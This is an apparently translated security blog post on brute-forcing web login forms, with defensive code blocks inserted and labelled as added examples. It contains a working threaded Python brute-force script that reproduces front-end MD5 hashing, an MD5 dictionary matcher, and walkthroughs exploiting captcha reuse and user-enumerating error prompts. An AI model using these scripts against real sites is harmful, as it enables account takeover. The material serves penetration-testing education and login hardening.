Analysis of web brute-force guessing

Posted by fierce at 2020-02-26

0x01 Preface

The web login interface is the channel through which a website's front end reaches the back end. The login management interface is exposed to common web attacks such as SQL injection, XSS, weak passwords and brute-force guessing. This article gives a simple analysis of the approach to web brute-force guessing and illustrates it with vulnerability examples.

0x02 Approach

A web login interface has three main elements: user name, password, and verification code (captcha). The simplest approach is:

1. Obtain user names, for example from login error prompts, author signatures on the site's articles, social engineering, etc.

2. Guess passwords with an effective dictionary.

3. Recognise or bypass the verification code; common cases are that the verification code is checked separately from the user name and password, that it fails to refresh automatically, or that it can be reused.

According to how the credentials are transmitted over HTTP, login forms can roughly be divided into two types:

Type 1: plaintext transmission

This is the most common case: a web application with no verification code and no limit on failed logins, where the user name and password alone are enough to log in, so the dictionary can be loaded directly for brute forcing. The usual tool is Burp Suite Intruder, which supports several attack modes: a single dictionary on one position (sniper), the same dictionary on several fields (battering ram), several dictionaries mapped position by position (pitchfork), and every combination of several dictionaries (cluster bomb).

Type 2: front-end JS encryption

Many web applications now use JS to "encrypt" the password during login before sending it to the server, so the password seen in a proxy tool is the encrypted (in practice usually hashed) value, which adds some trouble to brute forcing. JS-encrypted brute forcing is analysed below.
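Both transmission types leave the same trace on the server: a burst of failed logins from one source, against one account, or across many user names. The following detector, an added example that is not part of the original post, runs sliding-window counts over a constructed application authentication log (the line format and the sample lines are assumptions, not data from the page) and raises one alert per pattern: password guessing against a single account, a source exceeding the failure threshold, and a source probing many distinct user names.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample of an application authentication log (not from the page).
# Assumed line format: "<ISO-8601 timestamp> ip=<source> user=<name> result=<ok|fail>"
SAMPLE_LOG = (
    # one source trying twelve passwords against one account, then succeeding
    [f"2020-02-26T10:00:{i:02d} ip=203.0.113.5 user=admin result=fail" for i in range(12)]
    + ["2020-02-26T10:00:12 ip=203.0.113.5 user=admin result=ok"]
    # one source probing many different user names once each (user enumeration)
    + [f"2020-02-26T10:03:{i:02d} ip=198.51.100.7 user={u} result=fail"
       for i, u in enumerate(["root", "test", "guest", "oracle", "sysadmin", "operator"])]
    # a legitimate user mistyping twice and then logging in
    + ["2020-02-26T10:05:00 ip=192.0.2.9 user=bob result=fail",
       "2020-02-26T10:05:07 ip=192.0.2.9 user=bob result=fail",
       "2020-02-26T10:05:15 ip=192.0.2.9 user=bob result=ok"]
)

LINE_RE = re.compile(r"^(?P<ts>\S+) ip=(?P<ip>\S+) user=(?P<user>\S+) result=(?P<result>ok|fail)$")


def parse_events(lines):
    """Turn log lines into (timestamp, ip, user, result) tuples, skipping malformed lines."""
    events = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m:
            events.append((datetime.fromisoformat(m["ts"]), m["ip"], m["user"], m["result"]))
    return sorted(events)


def detect_bruteforce(lines, window=timedelta(minutes=5),
                      user_threshold=5, ip_threshold=10, distinct_user_threshold=5):
    """Sliding-window counts of failed logins; each alert fires once per key."""
    fails_by_user = defaultdict(deque)   # user -> timestamps of recent failures
    fails_by_ip = defaultdict(deque)     # ip   -> (timestamp, user) of recent failures
    fired = set()
    alerts = []

    def raise_once(alert):
        if alert not in fired:
            fired.add(alert)
            alerts.append(alert)

    for ts, ip, user, result in parse_events(lines):
        if result != "fail":
            continue
        fails_by_user[user].append(ts)
        fails_by_ip[ip].append((ts, user))
        # drop entries that have fallen out of the window
        while fails_by_user[user] and ts - fails_by_user[user][0] > window:
            fails_by_user[user].popleft()
        while fails_by_ip[ip] and ts - fails_by_ip[ip][0][0] > window:
            fails_by_ip[ip].popleft()

        if len(fails_by_user[user]) >= user_threshold:
            raise_once(("password-guessing", user, ip))
        if len(fails_by_ip[ip]) >= ip_threshold:
            raise_once(("brute-force-source", ip))
        if len({u for _, u in fails_by_ip[ip]}) >= distinct_user_threshold:
            raise_once(("username-enumeration", ip))
    return alerts


if __name__ == "__main__":
    for alert in detect_bruteforce(SAMPLE_LOG):
        print(alert)
```

The thresholds are deliberately low so the sample triggers; in production they are tuned per application, and the distinct-user rule is the one that catches the "login error prompt reveals whether a user exists" pattern, because each probe there fails exactly once.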

0x03 Brute forcing behind JS encryption

Common front-end JS "encryption" schemes are MD5, Base64 and SHA1 (hashes and encodings rather than real encryption, so the server receives a fixed transformation of the password). A simple demo is written here as a test.

<meta charset="utf-8">
<script type="text/ecmascript" src="md5.js"></script>
<script type="text/ecmascript">
function checkInput() {
    // replace the submitted password with its hex MD5; the plaintext field has no name, so only the hash is sent
    var password_input = document.getElementById('password');
    var password_md5 = document.getElementById('password_md5');
    password_md5.value = hex_md5(password_input.value);
    return true;
}
</script>
<form action="login.php" method="post" onsubmit="return checkInput()">
    用户:<input type="text" id="username" name="username"> <br/>
    密码:<input type="password" id="password"> <br/>
    <input type="hidden" id="password_md5" name="password">
    <input type="submit" value="提交" />
</form>

Submit the form and capture the request. The password field no longer carries the plaintext but its MD5 hash:

This common JS MD5 scheme can be handled in two ways: use Intruder's payload processing rules, which support multiple hash and encoding operations, to hash the password field; or write a Python script. Anyone familiar with the hashing algorithm can reimplement it, or simply reuse the website's own JS file to hash the password field.

3.1 Burp Suite Intruder

1. Capture the request and send it to Intruder, mark the relevant parameters, and select the fourth attack mode, "cluster bomb".

2. Load the user name dictionary and the password dictionary respectively. When configuring the password dictionary, add an MD5 hash payload-processing rule so the password field is hashed.

3. Start the attack and judge success by the length of the response. The user name and the MD5 value of the password field are obtained: admin: 21232f297a57a5a743894a0e4a801fc3

4. Looking up the MD5 value succeeds and yields the user name and password admin / Admin.

3.2 PyExecJS

Here Python's execjs is used to run the site's JS and reproduce the front end's hashing of the account password.

Preparation:

pip install PyExecJS

PhantomJS download:

Write a Python script to do the brute forcing:

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import requests
import execjs
from concurrent.futures import ThreadPoolExecutor

# Placeholders: the demo login.php above and two dictionary files, one entry per line
url = 'http://127.0.0.1/login.php'
username_file = 'username.txt'
password_file = 'password.txt'


def getpass(plain):
    # run the site's own md5.js through PhantomJS so the hash matches what the browser would send
    with open('md5.js', 'r') as js:
        source = js.read()
    phantom = execjs.get('PhantomJS')
    ctx = phantom.compile(source)
    return ctx.call('hex_md5', plain)


def login(user, passwd):
    payload = {'username': user, 'password': getpass(passwd)}
    headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0'}
    response = requests.post(url, data=payload, headers=headers, timeout=5)
    # the demo login.php is assumed to answer "fail" on a wrong password
    if response.text.count('fail') < 1:
        print('[success] ' + url + ':' + user + ':' + passwd)


def getLines(fileName):
    # read a dictionary, skipping blank lines and '#' comments
    lines = []
    with open(fileName, 'r') as fd:
        for line in fd:
            line = line.strip()
            if not len(line) or line.startswith('#'):
                continue
            lines.append(line)
    return lines


if __name__ == '__main__':
    username_list = getLines(username_file)
    password_list = getLines(password_file)
    # 20 worker threads (the original used the third-party threadpool package)
    with ThreadPoolExecutor(max_workers=20) as pool:
        for user in username_list:
            for passwd in password_list:
                pool.submit(login, user, passwd)

The user account password is successfully brute-forced.

0x04 Vulnerability examples

Two vulnerability examples follow. In real engagements brute force can be applied flexibly depending on the vulnerability; it is simple and extremely effective.

Vulnerability example 1: unauthorized access to user names + JS-encrypted password + reusable verification code

Vulnerability scenario: the website's home page contains a login module with user name, password, and verification code. Testing with normal input shows that the password is transmitted JS-encrypted, and that the verification code does not refresh automatically and can be reused.

1. Scanning the site for sensitive files reveals an unauthorized-access flaw: the back-end log management module can be opened directly by URL, exposing user login names.

2. Using the user name obtained this way, load the password dictionary, MD5-hash each dictionary entry, and brute-force the login. The MD5 value of user TB's password is obtained: 6846860684f05029abccc09a53cd66f1

3. Looking up the MD5 value gives the plaintext: a111111

Tip: what if the MD5 value cannot be looked up? We know it corresponds to one of the entries in our password dictionary, so a Python script can hash each entry and compare the MD5 values.

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import hashlib

# the MD5 value obtained from the brute-force step; the dictionary is one candidate per line in 1.txt
src = '6846860684f05029abccc09a53cd66f1'


def get_line(path='1.txt'):
    print('start:')
    with open(path, 'r', encoding='utf-8') as f:
        for line in f:
            line = line.strip()
            if len(line) == 0:
                continue
            # hash the candidate and compare against the captured value
            tmp = hashlib.md5(line.encode('utf-8')).hexdigest()
            print(line + "  :" + tmp)
            if tmp == src:
                print(src + u': md5对应的值为:' + line)
                return line
    return None


if __name__ == '__main__':
    get_line()

Test screenshot:

5. With the user names obtained and the cracked password, log in to the system successfully.

Vulnerability example 2: login error prompt + recognisable verification code

1. Enter the user name admin, a password, and the verification code. The prompt says that the user name entered does not exist and asks you to re-enter it.

2. Using the verification code recognition engine of PKAV HTTP Fuzzer 1.2, the verification code can be recognised automatically.

3. Guided by the login error prompt, load the user name dictionary and brute-force it. When the prompt changes to "the password you entered is incorrect, please re-enter", the user name sysadmin has been found; then load the password dictionary, brute-force it, and obtain the user's password.
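Every weakness used in this article has a server-side fix: the client-side MD5 of 0x03 is no protection because the hash is password-equivalent, example 1 worked because the verification code could be replayed, and example 2 worked because the error prompt distinguished an unknown user from a wrong password and nothing limited failures. The following login service is an added example, not code from the original post or from any product it mentions; the account name and password in it are constructed. It consumes each captcha token on first use, returns one generic message for every failure, verifies passwords with a salted server-side PBKDF2 hash (so unknown users cost the same time as known ones), and locks an account after a fixed number of failures.

```python
import hashlib
import hmac
import os
import secrets
import time
from collections import defaultdict

MAX_FAILURES = 5            # failed attempts before the account is temporarily locked
LOCKOUT_SECONDS = 15 * 60
PBKDF2_ROUNDS = 100_000     # slow server-side hash; a client-side MD5 would be password-equivalent
GENERIC_ERROR = "invalid user name, password or verification code"


def hash_password(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, PBKDF2_ROUNDS)


class LoginService:
    def __init__(self, clock=time.time):
        self.clock = clock
        self.users = {}                    # user name -> (salt, pbkdf2 hash)
        self.failures = defaultdict(int)   # user name -> consecutive failures
        self.locked_until = {}             # user name -> unix time the lock expires
        self.captchas = {}                 # one-time token -> expected answer
        # dummy credential so that unknown users go through the same hashing cost
        self._dummy_salt = os.urandom(16)
        self._dummy_hash = hash_password("dummy", self._dummy_salt)

    def add_user(self, username, password):
        salt = os.urandom(16)
        self.users[username] = (salt, hash_password(password, salt))

    def issue_captcha(self):
        """Create a fresh challenge; the token is removed on first use, so it cannot be replayed."""
        token = secrets.token_urlsafe(16)
        answer = secrets.token_hex(3)      # stands in for the text rendered into the captcha image
        self.captchas[token] = answer
        return token, answer

    def is_locked(self, username):
        return self.locked_until.get(username, 0) > self.clock()

    def login(self, username, password, captcha_token, captcha_answer):
        # 1. consume the captcha token before anything else; a replayed token is simply absent
        expected = self.captchas.pop(captcha_token, None)
        if expected is None or not hmac.compare_digest(expected.encode(), captcha_answer.encode()):
            return False, GENERIC_ERROR
        # 2. the lock is enforced even when the password is correct
        if self.is_locked(username):
            return False, GENERIC_ERROR
        # 3. unknown users are verified against the dummy hash so timing does not reveal existence
        salt, stored = self.users.get(username, (self._dummy_salt, self._dummy_hash))
        ok = hmac.compare_digest(hash_password(password, salt), stored) and username in self.users
        if not ok:
            self.failures[username] += 1
            if self.failures[username] >= MAX_FAILURES:
                self.locked_until[username] = self.clock() + LOCKOUT_SECONDS
            return False, GENERIC_ERROR    # same message whether the user or the password was wrong
        self.failures[username] = 0
        return True, "ok"


if __name__ == "__main__":
    svc = LoginService()
    svc.add_user("demo", "demo-passw0rd")          # constructed account
    token, answer = svc.issue_captcha()
    print(svc.login("demo", "demo-passw0rd", token, answer))   # first use of the token succeeds
    print(svc.login("demo", "demo-passw0rd", token, answer))   # replayed token is rejected
```

The generic message removes the signal that example 2 relied on, and the per-account counter turns the password-dictionary run of example 1 into a lockout after five attempts regardless of how the client transformed the password. In a real deployment the counters and tokens live in shared storage rather than in-process dictionaries, and lockouts are paired with alerting so the detector above has something to act on.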


About Me

A network security enthusiast with an obsessive pursuit of technology, committed to sharing original, high-quality practical content, including but not limited to penetration testing, WAF bypass, code audit, and security operations.